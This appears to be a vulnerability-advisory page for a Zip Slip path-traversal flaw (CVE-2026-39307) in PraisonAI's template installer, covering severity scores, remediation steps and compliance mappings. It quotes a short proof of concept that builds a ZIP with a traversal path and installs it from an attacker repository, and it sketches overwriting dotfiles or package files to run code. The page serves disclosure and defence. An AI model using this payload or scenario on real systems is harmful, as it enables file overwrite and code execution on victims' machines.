CVE-2026-39307: PraisonAI: Zip Slip enables arbitrary file write / RCE

GHSA-4ph2-f6pf-79wv HIGH CISA: TRACK*
Published April 6, 2026
CISO Take

PraisonAI's template installation feature fails to sanitize file paths in ZIP archives before extraction, allowing a crafted template to write files anywhere on the victim's filesystem via a classic Zip Slip attack (CWE-23). Any developer or AI engineer who runs `praisonai templates install` on a malicious template — whether tricked through social engineering or via a compromised community repository on GitHub — could have system files, dotfiles, or application code silently overwritten, escalating to full remote code execution. With no privileges required, network-accessible delivery, and a CVSS of 8.1, this is low-effort and high-impact; the CVE is not in CISA KEV and no public exploit scanner exists yet, but the PoC is trivially reproducible from the advisory itself, meaning any motivated actor can operationalize it within minutes. Upgrade all PraisonAI deployments immediately to version 4.5.113, and audit any community templates installed from unverified sources prior to the patch.

Sources: GitHub Advisory NVD ATLAS

What is the risk?

CVSS 8.1 HIGH with vector AV:N/AC:L/PR:N/UI:R reflects a network-delivered, low-complexity attack requiring only user interaction — exactly the kind of social engineering that targets AI practitioners installing community content. While not actively exploited (no KEV, no EPSS data), the Zip Slip technique is well-documented and the PoC is publicly disclosed in the GHSA advisory, dramatically lowering attacker barrier. The PraisonAI ecosystem attracts developers building multi-agent pipelines; this demographic often prioritizes speed over operational security hygiene, increasing the realistic exploitation surface. Impact is rated HIGH for both integrity (arbitrary file overwrite) and availability (system corruption), with a plausible path to RCE by overwriting startup scripts, cron jobs, or Python package files. Six other CVEs in the same package suggest a pattern of insufficient security review in PraisonAI's codebase.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
PraisonAI pip <= 4.5.112 4.5.113
1 dependents 82% patched ~0d to patch Full package profile →

Do you use PraisonAI? You're affected.

How severe is it?

CVSS 3.1
8.1 / 10
EPSS
0.3%
chance of exploitation in 30 days
Higher than 23% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Unchanged
C None
I High
A High

What should I do?

6 steps
  1. PATCH IMMEDIATELY

    Upgrade PraisonAI to version 4.5.113 or later — this is the only complete fix.

  2. AUDIT

    Review all templates installed from community sources (especially GitHub) prior to the patch date; check for unexpected files outside intended directories.

  3. WORKAROUND (if patching is delayed): Only install templates from verified, internal sources; disable external template installation via network policy or firewall rules blocking GitHub raw content for the PraisonAI process.

  4. DETECT

    Search for recently modified files outside expected application directories following any praisonai templates install invocations; monitor for unexpected writes to /tmp, home directories, or system paths during template extraction.

  5. HARDEN

    For custom deployments, validate the fix in 4.5.113 uses safe path extraction (e.g., checking that each member's resolved path stays within the target directory before extraction).

  6. POLICY

    Treat community AI agent templates with the same risk posture as unverified third-party code — require internal review before installation in sensitive environments.

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 9 - Risk management system
ISO 42001
A.6.1.1 - Information security policies for AI supply chain
NIST AI RMF
GOVERN-6.1 - Policies and procedures for AI supply chain risk management
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-39307?

PraisonAI's template installation feature fails to sanitize file paths in ZIP archives before extraction, allowing a crafted template to write files anywhere on the victim's filesystem via a classic Zip Slip attack (CWE-23). Any developer or AI engineer who runs `praisonai templates install` on a malicious template — whether tricked through social engineering or via a compromised community repository on GitHub — could have system files, dotfiles, or application code silently overwritten, escalating to full remote code execution. With no privileges required, network-accessible delivery, and a CVSS of 8.1, this is low-effort and high-impact; the CVE is not in CISA KEV and no public exploit scanner exists yet, but the PoC is trivially reproducible from the advisory itself, meaning any motivated actor can operationalize it within minutes. Upgrade all PraisonAI deployments immediately to version 4.5.113, and audit any community templates installed from unverified sources prior to the patch.

Is CVE-2026-39307 actively exploited?

No confirmed active exploitation of CVE-2026-39307 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-39307?

1. PATCH IMMEDIATELY: Upgrade PraisonAI to version 4.5.113 or later — this is the only complete fix. 2. AUDIT: Review all templates installed from community sources (especially GitHub) prior to the patch date; check for unexpected files outside intended directories. 3. WORKAROUND (if patching is delayed): Only install templates from verified, internal sources; disable external template installation via network policy or firewall rules blocking GitHub raw content for the PraisonAI process. 4. DETECT: Search for recently modified files outside expected application directories following any `praisonai templates install` invocations; monitor for unexpected writes to /tmp, home directories, or system paths during template extraction. 5. HARDEN: For custom deployments, validate the fix in 4.5.113 uses safe path extraction (e.g., checking that each member's resolved path stays within the target directory before extraction). 6. POLICY: Treat community AI agent templates with the same risk posture as unverified third-party code — require internal review before installation in sensitive environments.

What systems are affected by CVE-2026-39307?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI development environments, training pipelines, CI/CD ML pipelines.

What is the CVSS score for CVE-2026-39307?

CVE-2026-39307 has a CVSS v3.1 base score of 8.1 (HIGH). The EPSS exploitation probability is 0.31%.

What is the AI security impact?

Affected AI Architectures

agent frameworksAI development environmentstraining pipelinesCI/CD ML pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0011 User Execution
AML.T0011.001 Malicious Package
AML.T0079 Stage Capabilities
AML.T0104 Publish Poisoned AI Agent Tool

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: A.6.1.1
NIST AI RMF: GOVERN-6.1
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

The PraisonAI templates installation feature is vulnerable to a "Zip Slip" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's `zipfile.extractall()` without verifying if the files within the archive resolve outside of the intended extraction directory. ### Details Location: `src/praisonai/praisonai/cli/features/templates.py` (Line 852) Vulnerable Code snippet: ```python zip_ref.extractall(tmpdir) ``` During installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using `zip_ref.extractall(tmpdir)`. A specially crafted ZIP archive can contain file entries with relative paths (such as `../../../../tmp/evil.sh`). If extracting this archive in older Python versions or environments where extraction rules aren't strict, `extractall` will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem. ### PoC 1. Generate a malicious zip payload: ```python import zipfile with zipfile.ZipFile('malicious_template.zip', 'w') as z: # Adding a file that traverses directories z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip') ``` 2. Trick a user into installing the malicious template: ```bash praisonai templates install github:attacker/malicious_template ``` 3. Observe the `zip_slip_pwned.txt` file created in `/tmp/` on the victim's machine. ### Impact This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).

Exploitation Scenario

An attacker creates a GitHub repository named something legitimate like `praisonai-enterprise-templates` or `langchain-agent-templates`, publishes a README with convincing documentation, and seeds initial stars. The repository contains a `templates.zip` archive where one or more entries use path traversal sequences (e.g., `../../../../home/user/.bashrc` or `../../../../usr/local/lib/python3.x/site-packages/praisonai/__init__.py`). The attacker then promotes the template in PraisonAI community channels, Discord servers, or via a phishing email targeting AI engineers. When a victim runs `praisonai templates install github:attacker/enterprise-templates`, the CLI fetches and extracts the ZIP without path validation, silently writing the malicious payload to the traversal target. If the target is a Python package file, subsequent imports execute attacker-controlled code; if it is a shell dotfile, the payload executes on next login. In a CI/CD context, the compromise propagates to every build run on that agent.

Weaknesses (CWE)

CWE-23 — Relative Path Traversal: The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

  • [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
  • [Implementation] Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes: realpath() in C getCanonicalPath() in Java GetFullPath() in ASP.NET realpath() or abs_path() in Perl realpath() in PHP

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Timeline

Published
April 6, 2026
Last Modified
April 6, 2026
First Seen
April 7, 2026

Related Vulnerabilities